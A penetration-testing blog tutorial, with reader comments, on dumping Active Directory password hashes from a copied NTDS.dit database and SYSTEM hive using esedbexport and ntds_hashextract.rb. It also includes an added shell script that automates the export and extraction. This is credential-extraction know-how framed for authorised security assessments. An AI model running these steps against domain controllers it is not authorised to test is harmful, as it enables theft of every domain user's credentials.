Earlier this week I released a blog post on the Accuvant website explaining at a high level some of the techniques and use cases for my recently developed Metasploit modules. This article will be the first in a series of tutorials where I plan to do a deeper dive into the individual modules and some of their many uses during an Information Security Assessment or Penetration Testing exercise.
The ntds_hashextract.rb script is a standalone tool that can be used to quickly and efficiently extract Active Directory domain password hashes from the exported datatable of an NTDS.dit database. As it turns out, exporting the datatable can sometimes be tricky, so here is a detailed tutorial covering the methodology that I use and continue to have success with.
Step 1 – Install Libesedb
Libesedb is an open source C library developed to forensically extract information from Extensible Storage Engine (ESE) database files. In order to get what we need out of NTDS.dit we will first have to download and install the library from the following URL:
http://libesedb.googlecode.com/files/libesedb-alpha-20120102.tar.gz
Next we will need to extract the tarball, configure, make and install the library using the command line.
- $ tar xvzf libesedb-alpha-20120102.tar.gz
- $ cd libesedb-20120102
- $ ./configure
- $ make && make install
This is what the finished output looked like for me after everything was done on a fresh copy of Backtrack 5.
Step 2 – Export Tables From NTDS.dit
Now that you have a working install of the Libesedb library, make sure you’ve got a proper copy of the NTDS.dit database as well as the SYSTEM registry hive file on your machine. In case you weren’t already aware, you can use another one of my modules, ntdsgrab.rb, to obtain these items from a Windows Domain Controller, provided you have proper credentials of course. Here is what they look like on my system after downloading them via the Metasploit Framework.
Change into whatever directory contains your loot, in my case the /tmp/NTDS_Grab directory, and run esedbexport from the libesedb/esedbtools directory against your NTDS.dit database. It will export all of the tables and store them in a newly created directory called ntds.export.
Step 3 – Dump All The Hashes
At this point you’re ready to run ntds_hashextract.rb against the datatable (Table #4) and the SYSTEM registry hive file in order to grab all of the domain password hashes. If the domain is large enough (several thousand unique users) the command might take a few minutes to finish on your system, so go grab a cup of coffee. When it’s done it should look something like this.
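The three steps above are usually typed by hand, and the two mistakes that show up in the comments (a missing input file, and a wrong path to the exported datatable) only surface after a long export has already run. The following POSIX sh script is an added example, not code from the original post or from the ntds_hashextract.rb project: it wraps the same commands with pre-flight checks so the inputs are verified before esedbexport starts, and it locates the exported datatable by glob rather than hardcoding the table index. It assumes the loot directory holds NTDS.dit and the SYSTEM hive saved as "sys", that esedbexport is on PATH, that the esedbexport -t option sets the export basename, and that the extractor lives at the Metasploit path quoted in the comments (override with HASHEXTRACT=...).

```shell
#!/bin/sh
# Added example wrapping the tutorial's three steps with pre-flight checks.
# Assumptions: loot dir contains NTDS.dit and the SYSTEM hive as "sys";
# esedbexport is on PATH; extractor path matches the comments below.
HASHEXTRACT="${HASHEXTRACT:-/opt/metasploit/msf3/tools/ntds_hashextract.rb}"

# Step 0: both inputs must exist and be non-empty before an hours-long export.
check_loot() {
    dir="$1"
    [ -d "$dir" ] || { echo "no such directory: $dir" >&2; return 1; }
    for f in NTDS.dit sys; do
        [ -s "$dir/$f" ] || { echo "missing or empty: $dir/$f" >&2; return 1; }
    done
    return 0
}

# esedbexport names tables "<name>.<index>"; the datatable is index 3 (Table #4)
# in the post, but glob for it so a different table order still resolves.
find_datatable() {
    for t in "$1"/datatable.*; do
        [ -f "$t" ] && { echo "$t"; return 0; }
    done
    echo "no datatable.* found in $1" >&2
    return 1
}

# Step 2: export every table into <loot>/ntds.export.
# "-t ntds" is assumed to set the export basename (libesedb CLI option).
export_tables() {
    dir="$1"
    command -v esedbexport >/dev/null 2>&1 || { echo "esedbexport not on PATH" >&2; return 1; }
    [ -d "$dir/ntds.export" ] && { echo "refusing to overwrite $dir/ntds.export" >&2; return 1; }
    (cd "$dir" && esedbexport -t ntds NTDS.dit)
}

# Step 3: run the extractor against the datatable and the SYSTEM hive.
extract_hashes() {
    dir="$1"
    table=$(find_datatable "$dir/ntds.export") || return 1
    ruby "$HASHEXTRACT" "$table" "$dir/sys"
}

# Full pipeline: stops at the first failing step.
run_pipeline() {
    check_loot "$1" && export_tables "$1" && extract_hashes "$1"
}

# Usage: sh ntds_pipeline.sh /tmp/NTDS_Grab
if [ "$#" -gt 0 ]; then run_pipeline "$1"; fi
```

The checks are deliberately cheap: a missing "sys" file or an already-present ntds.export directory is reported immediately instead of after the export has run, and the extractor is handed the datatable path the exporter actually produced.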
That’s all for now, check back soon for more in this series.
Thanks for reading.
This should do it; check spaces between datatable.3 & the script before. Place your file in the right directory. :D
ruby /opt/metasploit/msf3/tools/ntds_hashextract.rb ntds.export datatable.3 sys
Hi,
thanks for the write-up. I’m stress-testing the tools with an 8GB ntds.dit. The esedbexport process seems to be doing fine. 8 hours have passed and my datatable.3 file is still growing steadily towards a similar size. Once this is finished there are multiple options to go. Do you have any recommendations or experience to confirm that this will work in a large scale environment?
Thanks
Don
Hi,
I run this command:
ruby /opt/metasploit/msf3/tools/ntds_hashextract.rb ntds.export/datatable.3 sys
and get this result:
/opt/metasploit/msf3/tools/ntds_hashextract.rb:101:in `update': can't convert nil into String (TypeError)
from /opt/metasploit/msf3/tools/ntds_hashextract.rb:101:in `decrypt_pek'
from /opt/metasploit/msf3/tools/ntds_hashextract.rb:175:in `'
Do you have any idea why?
Yeah, so this isn’t included in the Metasploit framework yet. I am still working things out with the developers. If you want it to work you need to clone the entire pentestgeek repo and run from there.